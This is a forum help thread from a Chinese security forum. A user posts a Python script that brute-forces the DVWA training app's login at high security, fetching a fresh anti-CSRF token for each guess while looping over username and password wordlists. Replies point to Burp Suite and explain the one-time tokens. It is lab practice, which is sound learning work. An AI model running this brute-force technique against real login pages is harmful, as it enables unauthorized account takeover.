吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 254|回复: 8
上一主题 下一主题
收起左侧

[求助] dvwa暴力破解高难度,使用python bs4攻击,正确的配对响应码不对

[复制链接]
跳转到指定楼层
楼主
ywk66618 发表于 2025-3-14 20:17 回帖奖励
45吾爱币
本帖最后由 ywk66618 于 2025-3-14 20:29 编辑

from bs4 import BeautifulSoup
import  requests

header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0',
    'Cookie':'Hm_lvt_d7c7037093938390bc160fc28becc542=1741916419,1741917396; PHPSESSID=4pqq1gtsvidjufpus7posv4jb1; security=high'
}
url="http://192.168.63.135/dvwa/vulnerabilities/brute/index.php"

def get_token(url,headers):
    r=requests.get(url,headers=header)
    print(r.status_code)
    html=r.content.decode()
    #print(len(html))
    soup=BeautifulSoup(html,"html.parser")
    user_token=soup.find_all('input')[3].get('value')
    return user_token


i=0
for admin in open("D:\\pythonzzzzzz\\smalldic_admin.txt"):
    for line in open("D:\\pythonzzzzzz\\smalldic_password.txt"):
        u_token=get_token(url,header)
        username=admin.strip()
        password=line.strip()
        payload={'username':username,'password':password,'login':'登录','user_token':u_token}
        print(payload)
        i=i+1
        response=requests.get(url,params=payload,headers=header)
        print(i,username,password,len(response.content.decode()))
        user_token=get_token(url,header)

屏幕截图 2025-03-14 193628.png (60.59 KB, 下载次数: 0)

屏幕截图 2025-03-14 193628.png

最佳答案

查看完整内容

为什么不使用burpsuite呢? 视频演示:输入密码后稍等一会,打不开再点一次试试。 密码:52pojie https://enclosed.cc/01jpajkrdb1bcs47498pntgaet#pw:TuyUyeEu9Z_-5VG7g2M5s8aUWxXuO_nBSo8gI9LHYQc

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

沙发
netsparker 发表于 2025-3-14 20:17
本帖最后由 netsparker 于 2025-3-14 22:59 编辑

为什么不使用burpsuite呢?
视频演示:输入密码后稍等一会,打不开再点一次试试。
密码:52pojie

https://enclosed.cc/01jpajkrdb1bcs47498pntgaet#pw:TuyUyeEu9Z_-5VG7g2M5s8aUWxXuO_nBSo8gI9LHYQc
受到警告 3#
jorying 发表于 2025-3-14 21:22
终于有帐号了,终于能发言了,处女评论!赞赞赞

免费评分

参与人数 1吾爱币 -2 违规 +1 收起 理由
magiclyan -2 + 1 请勿灌水,提高回帖质量是每位会员应尽的义务!技术版面灌水的加重处罚

查看全部评分

4#
dkmg 发表于 2025-3-14 22:00
5#
0316 发表于 2025-3-14 22:03
下载看看,好不好用
6#
 楼主| ywk66618 发表于 2025-3-14 23:02 |楼主
本帖最后由 ywk66618 于 2025-3-14 23:16 编辑
netsparker 发表于 2025-3-14 22:45
为什么不使用burpsuite呢?
视频演示:
密码:52pojie

尝试用burpsuite正则表达式,response没有html内容,找不到token

屏幕截图 2025-03-14 225944.png (172.46 KB, 下载次数: 0)

屏幕截图 2025-03-14 225944.png
7#
 楼主| ywk66618 发表于 2025-3-14 23:37 |楼主
dkmg 发表于 2025-3-14 22:00
试试仅在发送请求前获取一次有效的 token?

还是一样的结果
8#
Yohan1988 发表于 2025-3-15 10:03
感觉很厉害
9#
netsparker 发表于 2025-3-15 10:27
ywk66618 发表于 2025-3-14 23:02
尝试用burpsuite正则表达式,response没有html内容,找不到token

第一次的就需要带上token访问,需要一个没使用过的token,还有,你登陆了没有,请求包只能使用一次
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-3-15 21:08

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表